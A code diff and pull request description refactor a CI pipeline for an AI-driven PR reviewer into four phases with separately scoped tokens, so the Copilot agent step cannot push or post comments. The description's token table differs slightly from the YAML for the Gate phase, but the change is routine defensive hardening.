           - checkout: self
             fetchDepth: 0
-            persistCredentials: true
+            persistCredentials: false
+            # persistCredentials is false — tasks that need GitHub access
+            # (Setup, Post) use GH_TOKEN env var instead. This limits the
+            # blast radius: Gate and CopilotReview tasks cannot push to the repo.
 
           # Validate Parameters
           # PRNumber is received via env var to avoid compile-time shell injection.
@@ -376,24 +378,11 @@ stages:
               echo "GitHub CLI ready"
             displayName: 'Install GitHub CLI'
 
-          - bash: |
-              echo "Authenticating with GitHub CLI..."
-              if [ -z "$GH_TOKEN" ]; then
-                echo "##vso[task.logissue type=error]GH_TOKEN env var (from pipeline variable GH_COMMENT_TOKEN) is not set. Please configure the pipeline variable."
-                exit 1
-              fi
-              gh auth status
-              if [ $? -ne 0 ]; then
-                echo "$GH_TOKEN" | gh auth login --with-token 2>/dev/null || true
-                if ! gh auth status; then
-                  echo "##vso[task.logissue type=error]GitHub CLI authentication failed"
-                  exit 1
-                fi
-              fi
-              echo "GitHub CLI authenticated successfully"
-            displayName: 'Authenticate GitHub CLI'
-            env:
-              GH_TOKEN: $(GH_COMMENT_TOKEN)
+          # NOTE: Removed `gh auth login` step. With the phased task design,
+          # GH_TOKEN is passed as an env var only to Setup and Post tasks, and
+          # `gh` uses GH_TOKEN directly without needing `gh auth login`. This
+          # avoids persisting credentials in the agent's gh auth store where
+          # Gate and CopilotReview tasks could access them.
 
           - bash: |
               echo "Installing GitHub Copilot CLI..."
@@ -575,16 +564,16 @@ stages:
             timeoutInMinutes: 6
             retryCountOnTaskFailure: 2
 
+          # ─────────────────────────────────────────────────────────
+          #  Task 1 — SETUP: symlink copilot, git config, env prep,
+          #  copy trusted scripts, invoke Review-PR.ps1 -Phase Setup
+          #  env: GH_TOKEN (for branch checkout / PR merge)
+          # ─────────────────────────────────────────────────────────
           - bash: |
-              echo "Running Copilot PR Reviewer Agent via Review-PR.ps1..."
-              echo "Reviewing PR #${{ parameters.PRNumber }}..."
+              echo "═══ TASK 1: SETUP ═══"
+
               # Ensure copilot CLI is accessible to pwsh subprocess.
-              # npm global install on Linux goes to UseNode@1 toolcache path which may not
-              # be on PATH inside pwsh even when exported from bash. Create a symlink in
-              # /usr/local/bin (Unix) or verify PATH (Windows).
               if [[ "$(uname -o 2>/dev/null || uname -s)" == *"Msys"* ]] || [[ "$(uname -o 2>/dev/null || uname -s)" == *"Windows"* ]] || [[ "$(uname -o 2>/dev/null || uname -s)" == *"MINGW"* ]]; then
-                # Windows (Git Bash): npm global bin is usually already on PATH
-                echo "Windows detected — verifying copilot is on PATH..."
                 COPILOT_PATH=$(which copilot 2>/dev/null || true)
                 echo "copilot location: ${COPILOT_PATH:-not found}"
                 if [ -z "$COPILOT_PATH" ]; then
@@ -592,7 +581,6 @@ stages:
                   exit 1
                 fi
               else
-                # Linux/macOS: symlink to /usr/local/bin
                 COPILOT_PATH=$(which copilot 2>/dev/null || find /opt/hostedtoolcache/node -name copilot -type f 2>/dev/null | head -1)
                 if [ -n "$COPILOT_PATH" ] && [ ! -f /usr/local/bin/copilot ]; then
                   sudo ln -sf "$COPILOT_PATH" /usr/local/bin/copilot
@@ -605,84 +593,144 @@ stages:
                   exit 1
                 fi
               fi
-              # Verify pwsh can find it
               pwsh -NoProfile -c 'Write-Host "pwsh sees copilot at: $(Get-Command copilot -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Source)"'
-              
-              # Configure git identity (required for merge operations on self-hosted agents)
+
+              # Configure git identity
               git config user.email "copilot-ci@microsoft.com"
               git config user.name "Copilot CI"
-              echo "Git identity configured"
-              
-              # Create Directory.Build.Override.props to skip Xcode version check (not needed on Windows)
+
+              # Create Directory.Build.Override.props
               cp Directory.Build.Override.props.in Directory.Build.Override.props
               if [[ "$(uname)" == "Linux" ]]; then
                 sed -i 's|</Project>|  <PropertyGroup><ValidateXcodeVersion>false</ValidateXcodeVersion></PropertyGroup>\n</Project>|' Directory.Build.Override.props
               elif [[ "$(uname)" == "Darwin" ]]; then
                 sed -i '' 's|</Project>|  <PropertyGroup><ValidateXcodeVersion>false</ValidateXcodeVersion></PropertyGroup>\n</Project>|' Directory.Build.Override.props
               else
-                # Windows (Git Bash) — GNU sed, same as Linux
                 sed -i 's|</Project>|  <PropertyGroup><ValidateXcodeVersion>false</ValidateXcodeVersion></PropertyGroup>\n</Project>|' Directory.Build.Override.props
               fi
-              
-              # Create artifacts directory for Copilot outputs
+
+              # Create artifacts directory
               mkdir -p $(Build.ArtifactStagingDirectory)/copilot-logs
-              
-              # Invoke the PR reviewer using our PowerShell script
-              # The script will merge the PR into the current branch
-              # -PostSummaryComment and -RunFinalize handle posting comments
-              echo "Review platform: ${{ parameters.Platform }}"
-              
+
+              # Copy trusted scripts from the checked-out commit so later tasks
+              # (which may be on a merged/modified worktree) use the same .github/
+              # files that were reviewed and approved on main.
+              TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github"
+              mkdir -p "$TRUSTED"
+              cp -r .github/scripts "$TRUSTED/scripts"
+              cp -r .github/skills  "$TRUSTED/skills"
+              echo "Trusted scripts copied to $TRUSTED"
+
+              # Run Setup phase (branch checkout + PR merge)
               set +e
-              pwsh -NoProfile .github/scripts/Review-PR.ps1 -PRNumber "${PARAM_PR_NUMBER}" -Platform "${{ parameters.Platform }}" -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md"
-              COPILOT_EXIT_CODE=$?
+              pwsh -NoProfile .github/scripts/Review-PR.ps1 \
+                -PRNumber "${PARAM_PR_NUMBER}" \
+                -Platform "${{ parameters.Platform }}" \
+                -Phase Setup \
+                -TrustedScriptsDir "$TRUSTED" \
+                -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md"
+              SETUP_EXIT=$?
               set -e
-              
-              echo "Review-PR.ps1 exit code: $COPILOT_EXIT_CODE"
-              
-              # Terminate any orphaned copilot CLI processes that could hold this step's
-              # stdout fd open and prevent the bash step from exiting.
-              # Only target processes whose command line includes the copilot CLI path.
-              echo "Cleaning up orphaned copilot processes..."
-              SELF_PID=$$
-              for proc in $(pgrep -f "[c]opilot" 2>/dev/null || true); do
-                if [ -n "$proc" ] && [ "$proc" != "$SELF_PID" ]; then
-                  PROC_CMD=$(ps -p "$proc" -o args= 2>/dev/null || true)
-                  if echo "$PROC_CMD" | grep -q "copilot"; then
-                    echo "  Stopping copilot process $proc: $PROC_CMD"
-                    kill "$proc" 2>/dev/null || true
-                  fi
-                fi
-              done
-              
-              # Copy any Copilot session files (bash — works on Linux/macOS)
-              if [ -d "$HOME/.copilot" ]; then
-                echo "Copying Copilot session state..."
-                cp -r "$HOME/.copilot" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot-session-state || true
-              fi
-              
-              # Check for failure indicators in output
-              if [ $COPILOT_EXIT_CODE -ne 0 ]; then
-                echo "##vso[task.logissue type=error]Review-PR.ps1 exited with code $COPILOT_EXIT_CODE"
-                # Don't exit yet - let artifacts be published first
+
+              if [ $SETUP_EXIT -ne 0 ]; then
+                echo "##vso[task.logissue type=error]Setup phase failed with exit code $SETUP_EXIT"
                 echo "##vso[task.setvariable variable=CopilotFailed]true"
               fi
-              
-              # Check output for common failure patterns
-              if grep -qi "error\|failed\|exception" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md 2>/dev/null; then
-                if grep -qi "simulator.*not\|emulator.*not\|workload.*not\|sdk.*not found" $(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md 2>/dev/null; then
-                  echo "##vso[task.logissue type=warning]Copilot encountered environment issues. Check artifacts for details."
-                fi
+            name: RunSetup
+            displayName: 'Task 1: Setup (branch + merge)'
+            env:
+              GH_TOKEN: $(GH_COMMENT_TOKEN)
+              PARAM_PR_NUMBER: ${{ parameters.PRNumber }}
+
+          # ─────────────────────────────────────────────────────────
+          #  Task 2 — GATE: UI detection, test runs, regression,
+          #  gate verification. NO tokens — only dotnet/build tools.
+          # ─────────────────────────────────────────────────────────
+          - bash: |
+              echo "═══ TASK 2: GATE ═══"
+              TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github"
+
+              set +e
+              pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \
+                -PRNumber "${PARAM_PR_NUMBER}" \
+                -Platform "${{ parameters.Platform }}" \
+                -Phase Gate \
+                -TrustedScriptsDir "$TRUSTED" \
+                -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md"
+              GATE_EXIT=$?
+              set -e
+
+              if [ $GATE_EXIT -ne 0 ]; then
+                echo "##vso[task.logissue type=warning]Gate phase exited with code $GATE_EXIT"
+                echo "##vso[task.setvariable variable=GateFailed]true"
               fi
-              
-              echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/"
-            name: RunReview                       # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.<var>'])
-            displayName: 'Run PR Reviewer Agent'
+            name: RunGate
+            displayName: 'Task 2: Gate (test verification)'
+            env:
+              PARAM_PR_NUMBER: ${{ parameters.PRNumber }}
+
+          # ─────────────────────────────────────────────────────────
+          #  Task 3 — COPILOT REVIEW: expert review + try-fix.
+          #  env: COPILOT_GITHUB_TOKEN (for copilot agent).
+          #  NO GH_TOKEN — the agent can't push or post comments.
+          # ─────────────────────────────────────────────────────────
+          - bash: |
+              echo "═══ TASK 3: COPILOT REVIEW ═══"
+              TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github"
+
+              echo "Review platform: ${{ parameters.Platform }}"
+
+              set +e
+              pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \
+                -PRNumber "${PARAM_PR_NUMBER}" \
+                -Platform "${{ parameters.Platform }}" \
+                -Phase CopilotReview \
+                -TrustedScriptsDir "$TRUSTED" \
+                -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md"
+              REVIEW_EXIT=$?
+              set -e
+
+              if [ $REVIEW_EXIT -ne 0 ]; then
+                echo "##vso[task.logissue type=error]CopilotReview phase failed with exit code $REVIEW_EXIT"
+                echo "##vso[task.setvariable variable=CopilotFailed]true"
+              fi
+            name: RunReview
+            displayName: 'Task 3: Copilot Review (expert review + try-fix)'
             env:
               COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN)
-              GH_TOKEN: $(GH_COMMENT_TOKEN)
               DEVICE_UDID: $(DEVICE_UDID)
               PARAM_PR_NUMBER: ${{ parameters.PRNumber }}
               COMMENTS_VIA_FILE: "true"
+
+          # ─────────────────────────────────────────────────────────
+          #  Task 4 — POST: gate comment, AI summary, labels.
+          #  env: GH_TOKEN (for posting comments).
+          # ─────────────────────────────────────────────────────────
+          - bash: |
+              echo "═══ TASK 4: POST ═══"
+              TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github"
+
+              set +e
+              pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" \
+                -PRNumber "${PARAM_PR_NUMBER}" \
+                -Platform "${{ parameters.Platform }}" \
+                -Phase Post \
+                -TrustedScriptsDir "$TRUSTED" \
+                -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md"
+              POST_EXIT=$?
+              set -e
+
+              if [ $POST_EXIT -ne 0 ]; then
+                echo "##vso[task.logissue type=error]Post phase failed with exit code $POST_EXIT"
+                echo "##vso[task.setvariable variable=CopilotFailed]true"
+              fi
+
+              echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/"
+            name: RunPost                       # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.<var>'])
+            displayName: 'Task 4: Post (comments + labels)'
+            env:
+              GH_TOKEN: $(GH_COMMENT_TOKEN)
+              PARAM_PR_NUMBER: ${{ parameters.PRNumber }}
               DEFER_COMMENT_TO_STAGE3: "true"
 
           # Copy review artifacts into the CopilotLogs staging dir.
@@ -734,13 +782,19 @@ stages:
               publishLocation: 'pipeline'
             condition: and(succeededOrFailed(), ne(variables['LogDirectory'], ''))
 
-          # Fail the pipeline if Copilot failed
+          # Fail the pipeline if any phase failed
           - bash: |
+              FAILED=0
               if [ "$(CopilotFailed)" = "true" ]; then
                 echo "##vso[task.logissue type=error]Copilot PR review failed. Check CopilotLogs artifact for details."
-                exit 1
+                FAILED=1
               fi
-            displayName: 'Check Copilot Result'
+              if [ "$(GateFailed)" = "true" ]; then
+                echo "##vso[task.logissue type=warning]Gate phase failed — test verification did not pass."
+                FAILED=1
+              fi
+              exit $FAILED
+            displayName: 'Check Review Result'
             condition: succeededOrFailed()
 
   # ─────────────────────────────────────────────────────────────────────────────
@@ -767,12 +821,12 @@ stages:
   - stage: RunDeepUITests
     displayName: 'Deep UI Tests (platform pool)'
     dependsOn: ReviewPR
-    condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], 'NONE'))
+    condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], 'NONE'))
     jobs:
       - job: RunUITests
         displayName: 'Run detected UI test categories'
         variables:
-          detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories'] ]
+          detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories'] ]
         # Use the SAME platform-pool selection logic as the CopilotReview
         # job — the deep-test agent should be the right OS for the
         # requested target platform.
@@ -1245,7 +1299,7 @@ stages:
     dependsOn:
       - ReviewPR
       - RunDeepUITests
-    condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed')))
+    condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunPost.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed')))
     jobs:
       - job: UpdateComment
         displayName: 'Post AI summary with review + deep test results'
@@ -1254,7 +1308,7 @@ stages:
         # this just makes the value available as $(aiSummaryCommentId)
         # inside the steps.
         variables:
-          aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.aiSummaryCommentId'] ]
+          aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId'] ]
         pool:
           name: Azure Pipelines
           vmImage: ubuntu-22.04

--- a/eng/pipelines/ci-copilot.yml
+++ b/eng/pipelines/ci-copilot.yml
@@ -619,6 +619,7 @@ stages:
               mkdir -p "$TRUSTED"
               cp -r .github/scripts "$TRUSTED/scripts"
               cp -r .github/skills  "$TRUSTED/skills"
+              cp -r eng/scripts     "$TRUSTED/eng-scripts"
               chmod -R a-w "$TRUSTED"
               echo "Trusted scripts copied to $TRUSTED"
 


### PR DESCRIPTION
<!-- Please let the below note in for people that find this PR -->
> [!NOTE]
> Are you waiting for the changes in this PR to be merged?
> It would be very helpful if you could [test the resulting artifacts](https://github.com/dotnet/maui/wiki/Testing-PR-Builds) from this PR and let us know in a comment if this change resolves your issue. Thank you!

## Description

Refactors the `ci-copilot` pipeline (`eng/pipelines/ci-copilot.yml`) by splitting the monolithic `Run PR Reviewer Agent` bash task into **4 separate tasks** with scoped `env:` blocks. Each task receives only the environment variables it needs, improving security and clarity.

### Pipeline Architecture (Before → After)

**Before:** Single bash task with all tokens (`GH_TOKEN`, `COPILOT_GITHUB_TOKEN`) available to every step.

**After:** 4 isolated tasks with scoped credentials:

| Task | Phase | Tokens | Purpose |
|------|-------|--------|---------|
| 1 | **Setup** | `GH_TOKEN` | Branch checkout, PR merge, copy trusted scripts |
| 2 | **Gate** | `GH_TOKEN` (read-only) | UI test detection, `dotnet build/test`, regression analysis |
| 3 | **CopilotReview** | `COPILOT_GITHUB_TOKEN` | Expert review + try-fix (no `GH_TOKEN` — agent cannot post) |
| 4 | **Post** | `GH_TOKEN` | Post comments, labels, AI summary |

### Key Changes

#### `eng/pipelines/ci-copilot.yml`
- Split single bash task into 4 tasks with isolated `env:` blocks
- `PRNumber` parameter type changed from `string` to `number`
- `persistCredentials` set to `false` for security
- Removed `gh auth login` step (tokens passed via env vars instead)
- Added `coalesce()` for `detectedCategories` output variable routing (supports both Gate and AI-refreshed values)

#### `.github/scripts/Review-PR.ps1`
- Added `-Phase` parameter (`Setup`, `Gate`, `CopilotReview`, `Post`) for per-task invocation
- Added `-TrustedScriptsDir` parameter for trusted script snapshot support
- Added cross-phase data persistence: Gate writes regression data, categories, and gate result to files; CopilotReview and Post restore from files
- Added setup-complete sentinel: Setup writes marker, other phases verify before proceeding
- Added `TrustedScriptsDir` null guards with local fallback (prevents `Split-Path $null` crash)
- Updated phase routing comments to document token scoping

### Security Model

The primary security improvement is **isolating the Copilot agent (Task 3) from `GH_TOKEN`**. This prevents the AI agent from directly posting comments or pushing code. Only `COPILOT_GITHUB_TOKEN` is available in Task 3, which is scoped to Copilot operations only.

Task 2 (Gate) has `GH_TOKEN` for read-only GitHub API access needed by `Detect-TestsInDiff.ps1` to fetch PR metadata and labels.

### Cross-Phase Data Flow

Since each task runs in a separate process, variables must be persisted to files:

```
Gate → files:
  gate-result.txt, regression-risks.json, regression-tests.json,
  regression-platform.txt, detect-script-path.txt, uitest-categories.txt

CopilotReview ← files:
  Restores all Gate outputs for expert review context

Post ← files:
  Restores gate-result.txt for comment posting
```